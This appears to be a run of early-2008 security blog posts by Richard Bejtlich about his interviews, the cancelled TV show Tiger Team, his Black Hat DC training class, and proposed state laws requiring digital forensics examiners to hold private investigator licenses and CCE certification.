Taking a look at posts from the last year, I realized I forgot to mention a few events. First, Kai Roer wrote a security profile of me using a question-and-answer format. Second, Chris Byrd posted an interview with me that covers different ground. Finally, TechTarget and Addison-Wesley asked me to read a portion of my book Extrusion Detection, specifically the beginning of chapter 2. It is listed as the February 5, 2007 feature in their 2007 podcast archive. Thank you to Kai, Chris, and TechTarget/AW for these resources.

Minggu, 06 Januari 2008

No More Tiger Team?

You may have already heard about Tiger Team on the former Court TV (now TruTV, but I finally watched both episodes this weekend on my TiVo. I liked the "WWJD40D", "Core Impact", and "I am an Infosec Sellout" T-shirts. I especially liked the injection of time-based security into the jewelry heist scenario, where the tiger team was slowed by 15 minutes because they tried brute-forcing a keypad lock.

I contacted several PR reps at TruTV and asked about Tiger Team's future. One of them wrote back:

Thank you for your email and interest in Tiger Team.

Tiger Team was a special and likely won't be returning.

Please let me know if I can assist you with anything else.


That is a real shame -- I hope TruTV reconsiders.

Kamis, 03 Januari 2008

Reminder: Bejtlich Teaching at Black Hat DC 2008 Training

I just wanted to remind interested readers that Black Hat was kind enough to invite me back to teach TCP/IP Weapons School at Black Hat DC 2008 on 18-19 February 2008, at the Westin Washington DC City Center. This is currently my only scheduled training class in 2008. As you can see from the course description I will focus on OSI model layers 2-5 and add material on network security operations, like monitoring, incident response, and forensics. The cost for this single two-day class is now $2200 until 8 February, when online registration closes and the price increases. Register while seats are still available -- both of my sessions in Las Vegas sold out. Thank you.

Private Eyes Again

In May 2006 I wrote Avoid Incident Response and Forensics Work in These States after reading a great article by Mark Rasch about states requiring some digital forensics consultants to have private investigator licenses. One of my colleagues pointed me to a new article titled http://www.baselinemag.com/article2/0,1540,2242720,00.asp by Deb Radcliff. From the article:

Under pending legislation in South Carolina, digital forensic evidence gathered for use in a court in that state must be collected by a person with a PI license or through a PI licensed agency...

Otherwise, digital evidence collected by unlicensed practitioners could be excluded from criminal and civil court cases. Worse yet, those caught practicing without a license could face criminal prosecution...

South Carolina isn't alone in considering regulating digital forensics and restricting the practice to licensed PIs. Georgia, New York, Nevada, North Carolina, Texas, Virginia and Washington are some of the states going after digital forensic experts operating in their states without a PI license...

All but six states have PI licensing laws on the books, according to Jimmie Mesis, publisher of PI Magazine, 32 of which could be interpreted to include digital forensic investigators. While their languages differ, these licensing laws essentially consider a PI to be anybody engaging in the business of securing evidence to be used in criminal or civil proceedings...


Sounds scary so far. I take comfort in the following:

Computer forensics is more often used as an internal investigatory tool. In other words, probes and evidence collected inside the firewall stay inside the firewall. In these cases, none of the proposed or existing state laws requiring PI licenses apply. That is, until the case spills outside the enterprise domain—to a partner network or an Internet service provider, for instance.

At this point, most organizations should be turning investigations over to law enforcement or licensed PI agencies anyway, [Steve] Abrams[a licensed independent PI and computer forensic examiner based in Sullivans Island, S.C.] says. Maybe so, but history doesn't support Abrams' perspective, and IT experts and forensic consultants say most enterprises would rather keep their investigations quiet than risk public disclosure by going to law enforcement.


So those of us who perform forensics for our employers should be safe. Consultants, on the other hand...

At greater risk of exposure, however, are security and network management service providers, which often conduct investigations on behalf of their clients. In this case, they would be considered PI firms and need licensing in a majority of states, confirm Abrams and others.

Beyond a PI license, there's also certification to contend with:

States are looking to the failed Nevada legislation as a model for defining these qualifications. The attempted revision to the proposed statute defined a digital forensic professional as "a person who engages in the business of, or accepts employment using, specialized computer techniques for the recovery or analysis of digital information from any computer or digital storage device, with the intent to preserve evidence, and who as a part of his business provides reports or testimony in regards to that information."

Nevada's [failed] qualification guidelines include 18 months' experience, a Bachelor's degree in computer forensics, and a Certified Computer Examiner (CCE) credential or its successor equivalent. South Carolina won't have a requirement for any particular degree, but will require minimal training, CCE certification and annual continuing education to remain licensed, according to Abrams.

At present, the CCE is the most recognized forensic certification available to the private sector and the only one open to the private sector being considered in state PI licensing laws.


I never heard of the CCE until today. Getting the cert sounds easy:

The initial CCE process consists of a proctored online multiple choice question and answer examination, the forensic examination of a floppy diskette, the forensic examination of a CDR disk and the forensic examination of an image of a hard disk drive . An 80% or better average score is required to complete the process...

The primary purpose of this certification is to measure if the applicant understands and uses sound evidence handling and storage procedures and follows sound forensic examinations procedures when conducting examinations...

[M]ost of the grade is based upon following sound evidence handling and storage procedures and following sound examination procedures, not simply recovering the data. An 80% total average score will be required to obtain the Certified Computer Examiner(CCE) ® certification. Do not assume that we know your standard operating procedures. Your grade will be based solely upon what you have written in your reports and the exhibits that you provide.

The fee for taking the entire process is $395.


We had some good commentary in May 2006. Does anyone have any comments on this update?